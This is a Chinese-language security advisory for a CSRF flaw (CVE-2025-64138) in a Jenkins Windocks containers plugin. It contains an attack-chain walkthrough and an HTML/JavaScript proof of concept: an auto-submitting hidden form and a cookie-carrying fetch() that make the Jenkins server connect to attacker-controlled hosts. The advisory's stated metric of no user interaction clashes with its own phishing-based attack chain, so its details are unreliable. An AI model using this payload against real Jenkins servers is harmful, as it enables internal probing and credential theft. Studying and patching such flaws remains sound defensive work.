CVE-2025-64138 Jenkins Start Windocks Containers Plugin跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64138

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins Start Windocks Containers Plugin

漏洞概述

CVE-2025-64138是Jenkins Start Windocks Containers Plugin 1.4及更早版本中存在的一个跨站请求伪造（CSRF）安全漏洞。该漏洞允许攻击者通过诱导已登录的Jenkins用户在不知情的情况下发送恶意请求，从而连接到攻击者指定的URL。由于CSRF攻击利用了Web应用程序对用户浏览器的信任，攻击者可以在用户已认证的情况下执行各种未授权操作。在Jenkins插件的上下文中，这意味着攻击者可以滥用Start Windocks Containers插件的功能，强迫受害者的Jenkins实例连接到恶意的外部URL。这种攻击可能导致敏感信息泄露、凭据被窃取，或者将Jenkins实例作为进一步攻击的跳板。CVSS评分4.3（中等严重程度）反映了该漏洞的实际影响范围和危害程度。虽然该漏洞不直接导致代码执行或数据直接泄露，但攻击者通过控制外部URL连接，可以进行复杂的攻击链，包括端口扫描内部网络、探测服务、窃取AWS元数据等敏感操作。由于Jenkins通常具有较高的系统访问权限，此类漏洞的潜在影响可能被放大。

技术细节

该CSRF漏洞存在于Jenkins Start Windocks Containers Plugin的Windocks容器启动功能中。漏洞的根本原因在于插件缺少必要的CSRF令牌验证机制。攻击者可以构造一个恶意HTML页面，其中包含自动提交的表单或JavaScript代码，当Jenkins管理员访问该页面时，浏览器会自动向目标Jenkins实例发送HTTP请求。由于浏览器会自动携带用户的认证Cookie，Jenkins服务器会认为这是来自合法用户的请求。在技术实现上，攻击者通常会创建一个包含隐藏iframe或自动提交表单的网页，表单的action指向Jenkins的插件端点，参数设置为攻击者控制的URL。当受害者在已登录Jenkins的状态下访问该恶意页面时，浏览器会立即发送请求到Jenkins，触发连接外部URL的操作。这种攻击的隐蔽性在于：用户可能只是浏览了一个看似无害的网页，但实际上已经触发了一系列后台请求。攻击者指定的URL可以是攻击者控制的服务器，也可以是内部网络地址，从而实现对内网的探测和攻击。

攻击链分析

STEP 1

步骤1：侦察与准备

攻击者识别目标Jenkins环境及其安装的Start Windocks Containers Plugin版本（<=1.4），并确定有效的用户会话

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含自动提交表单或JavaScript代码的恶意HTML页面，表单指向Jenkins插件的漏洞端点

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他方式诱导Jenkins管理员访问恶意页面

STEP 4

步骤4：触发CSRF请求

当管理员访问恶意页面时，浏览器自动发送携带其认证Cookie的POST请求到Jenkins插件端点

STEP 5

步骤5：执行未授权操作

Jenkins服务器收到请求后，由于缺少CSRF验证，执行连接攻击者指定URL的操作

STEP 6

步骤6：信息收集或进一步攻击

攻击者通过控制的URL收集Jenkins实例的敏感信息、扫描内网、或将Jenkins作为跳板进行更深层次的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64138 -->
<!-- This PoC demonstrates how an attacker can trigger Jenkins Start Windocks Containers Plugin -->
<!-- to connect to an attacker-controlled URL via CSRF attack -->

<!DOCTYPE html>
<html>
<head>
    <title>Jenkins Plugin CSRF Test</title>
</head>
<body>
    <h1>Jenkins Start Windocks Containers Plugin CSRF Vulnerability</h1>
    <p>This page demonstrates CVE-2025-64138</p>
    
    <!-- Auto-submit form to trigger the vulnerable endpoint -->
    <form id="csrfForm" action="http://target-jenkins:8080/plugin/startWindocksContainers/connect" 
          method="POST" style="display:none;">
        <!-- Attacker's controlled URL -->
        <input type="hidden" name="url" value="http://attacker-controlled-server.com/malicious-endpoint" />
        <input type="hidden" name="containerName" value="windocks-test" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            console.log('CSRF PoC: Submitting request to Jenkins...');
            document.getElementById('csrfForm').submit();
        });
    </script>
    
    <p>If successful, Jenkins will connect to the attacker-specified URL.</p>
</body>
</html>

<!-- Alternative: Using fetch API for more stealthy attack -->
<script>
    fetch('http://target-jenkins:8080/plugin/startWindocksContainers/connect', {
        method: 'POST',
        credentials: 'include',  // Include session cookies
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: 'url=http://attacker.com/collect&containerName=test'
    });
</script>

影响范围

Jenkins Start Windocks Containers Plugin <= 1.4

防御指南

临时缓解措施

在官方修复版本发布之前，可以采取以下临时缓解措施：1）临时禁用Start Windocks Containers插件；2）在Jenkins全局安全配置中启用CSRF保护；3）限制Jenkins的网络访问，仅允许受信任的IP访问管理界面；4）使用IP白名单或VPN访问Jenkins控制台；5）监控网络流量，关注异常的外部连接行为；6）对Jenkins管理员进行安全意识培训，提高对钓鱼攻击的警惕性；7）考虑使用Web应用防火墙（WAF）过滤可疑请求。